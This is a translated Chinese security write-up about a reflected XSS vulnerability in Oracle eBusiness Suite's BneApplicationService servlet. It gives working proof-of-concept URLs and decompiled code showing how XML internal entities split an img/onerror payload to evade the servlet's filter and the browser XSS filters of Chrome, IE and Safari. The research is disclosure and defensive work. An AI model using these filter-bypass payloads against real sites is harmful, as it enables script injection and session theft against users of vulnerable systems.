使用XML Internal Entities绕过chrome和IE的Xss过滤

Web 应用程序在后端执行XML处理是很容易受到XSS攻击,可以使用XML内部实体绕过WE浏览器(如:chrome、IE、safari)的XSS浏览器。

绕过常用浏览器的 XSS 过滤器

Oracle的eBusiness Suite 12.x和更早版本中的BneApplicationService servlet有跨站点脚本漏洞, 这是寻找XML外部实体注入漏洞时发现的。

如果我们请求以下URL:

https://example.com/oa_servlets/oracle.apps.bne.webui.BneApplicationService?bne:page=Bne MsgBox&bne:messagexml=XXX

将会得到如下的响应:

The following error has occurred
Exception Name: oracle.apps.bne.exception.BneFatalException –
oracle.apps.bne.exception.BneFatalException: XML parse error in file at line 1, character 1.
Log File Bookmark: 392699

因此,我们修改请求并将其封装在XML标签中:

https://example.com/oa_servlets/oracle.apps.bne.webui.BneApplicationService?bne:page=Bne
MsgBox&bne:messagexml=%3CFOO%3EXXXXX%3C/FOO%3E

现在就会得到以下响应:

The following error has occurred
Exception Name: oracle.apps.bne.exception.BneFatalException – java.lang.ClassCastException:
oracle.xml.parser.v2.XMLText cannot be cast to oracle.xml.parser.v2.XMLElement
Log File Bookmark: 602808

我们需要解决这个问题就要查看类文件中包含什么。我们查看源代码,可以在createBodyBneStyle方法中找到以下内容:

XMLDocument localXMLDocument = BneXMLDomUtils.parseString(this.m_messagesXML);
 XMLElement localXMLElement1 =
(XMLElement)localXMLDocument.getDocumentElement();
 NodeList localNodeList = localXMLElement1.getChildNodes();
 for (int i = 0; i < localNodeList.getLength(); i++)
 {
 String str1 = "";
 String str2 = "";
 String str3 = "";
 String str4 = null;
 String str5 = null;
 Node localNode = null;
 XMLElement localXMLElement2 = (XMLElement)localNodeList.item(i);
 NamedNodeMap localNamedNodeMap = localXMLElement2.getAttributes();
 localNode = localNamedNodeMap.getNamedItem("bne:type");
 if (localNode != null) {
 str1 = localNode.getNodeValue();
 }
 localNode = localNamedNodeMap.getNamedItem("bne:text");
 if (localNode != null) {
 str2 = localNode.getNodeValue();
 }
 localNode = localNamedNodeMap.getNamedItem("bne:value");
 if (localNode != null) {
 str3 = localNode.getNodeValue();
 }
 localNode = localNamedNodeMap.getNamedItem("bne:cause");
 if (localNode != null) {
 str4 = localNode.getNodeValue();
 }
 localNode = localNamedNodeMap.getNamedItem("bne:action");
 if (localNode != null) {
 str5 = localNode.getNodeValue();
 }
 if ((!str1.equalsIgnoreCase("DATA")) && (str2 != ""))
 {
 localStringBuffer.append("<p><b>" + str2 + "</b></p>");
 localStringBuffer.append("<p>" + str4 + "</p>");

我们可以看到,如果我们将bne:text设置为除了数据之外的其他值,那么它和bne:cause的值传回浏览器。这允许我们创建一个查询字符串,这样将不再出现XML解析错误。

https://example.com/oa_servlets/oracle.apps.bne.webui.BneApplicationService?bne:page=BneMsgBox&bne:messagexml=%3Cmessage%3E%3Cbne:a%20xmlns%3Abne%3D%22foo%22%20bne%3Atext%3D%22ABCDEF%22%20bne%3Acause%3D%22GHIJKL%22%3E%3C/bne:a%3E%3C/message%3E

 

1

我们可以立即看到这很容易发生XSS攻击。 让我们尝试一些简单的实验:发送  <IMG SRC = / x onerror = alert(1)> 并看看会发生什么:

https://example.com/oa_servlets/oracle.apps.bne.webui.BneApplicationService?bne:page=BneMsgBox&bne:messagexml=%3Cmessage%3E%3Cbne:a%20xmlns%3Abne%3D%22foo%22%20bne%3Atext%3D%22ABCDEF%22%20bne%3Acause%3D%22%3CIMG%20SRC=/x%20onerror=alert(1)%3E%22%3E%3C/bne:a%3E%3C/message%3E

保留的程序字<message> <bne:a xmlns:bne =”foo”bne:text =”ABCDEF” bne:cause =”&lt; I … detected.

按下返回按钮并且删除保留的关键字。如果数值无法修改,请联系管理员。

现在我们看到BneApplicationService有一个内置的XSS过滤器,我们需要对他进行绕过。回想起来,我们最初是寻找XXE漏洞。 尝试外部XML实体绕过XSS过滤器失败后,我产生了使用内部XML实体绕过XSS过滤器的想法。 它允许我们通过将占位符分开写并在利用时恢复重组的方法对攻击特征进行掩饰。首先看一下那个字符会被过滤。首先尝试一下&lt;:

https://example.com/oa_servlets/oracle.apps.bne.webui.BneApplicationService?bne:page=BneMsgBox&bne:messagexml=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C!DOCTYPE%20DWL%20%5B%3C%21ENTITY%20xxx%20%22%26lt;%22%3E%3C%21ENTITY%20yyy%20%22IMG%22%3E%3C%21ENTITY%20zzz%20%22SRC%22%3E%3C%21ENTITY%20ppp%20%22one%22% 3E%5D%3E%3Cmessage%3E%3Cbne:a%20xmlns%3Abne%3D%22foo%22%20bne%3Atext%3D%22ABCDEF%22%20bne%3Acause%3D%22%26xxx;%26yyy;%20%26zzz;=/x%20%26ppp;rror=alert(1)%3E%22%3E%3C/bne:a%3E%3C/message%3E

2

已经运行成功了。为了绕过BneApplicationService内置过滤器,我们只需要使用一个内部XML实体的尖括号。下面我们增加一个xxx内部实体并为其匹配了一个&lt;:

<?xml version=”1.0″ encoding=”UTF-8″?><!DOCTYPE DWL [<!ENTITY xxx”&lt;”>]>

https://example.com/oa_servlets/oracle.apps.bne.webui.BneApplicationService?bne:page=BneMsgBox&bne:messagexml=%3Cmessage%3E%3Cbne:a%20xmlns%3Abne%3D%22foo%22%20bne%3Atext%3D%22ABCDEF%22%20bne%3Acause%3D%22IMG%20SRC=/x%20onerror=alert(1)%3E%22%3E%3C/bne:a%3E%3C/message%3E

alert(1)无法执行,这是意料之中的,因为Chrome’s的XSS过滤器检测到了攻击代码。
3
现在需要绕过chrome的xss过滤器。使用内部XML实体可以做到这一点,利用IMG、SRC和onerror来创建实体。使用XML重新封装解析,可以隐藏攻击代码而不被chrome识别出这是反射型XSS攻击。

https://example.com/oa_servlets/oracle.apps.bne.webui.BneApplicationService?bne:page=BneMsgBox&bne:messagexml=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%3C!DOCTYPE%20DWL%20%5B%3C%21ENTITY%20xxx%20%22%26lt;%22%3E%3C%21ENTITY%20yyy%20%22IMG%22%3E%3C%21ENTITY%20zzz%20%22SRC%22%3E%3C%21ENTITY%20ppp%20%22one%22% 3E%5D%3E%3Cmessage%3E%3Cbne:a%20xmlns%3Abne%3D%22foo%22%20bne%3Atext%3D%22ABCDEF%22%20bne%3Acause%3D%22%26xxx;%26yyy;%20%26zzz;=/x%20%26ppp;rror=alert(1)%3E%22%3E%3C/bne:a%3E%3C/message%3E

4
测试版本:Firefox version 47, Chrome 51, IE 11, Safari 9.1.1

【原文链接:  mottoin 小编翻译发布】

原创文章,作者:Tank,如若转载,请注明出处:http://www.mottoin.com/article/web/90739.html

发表评论

登录后才能评论

联系我们

021-62666911

在线咨询:点击这里给我发消息

邮件:root@mottoin.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code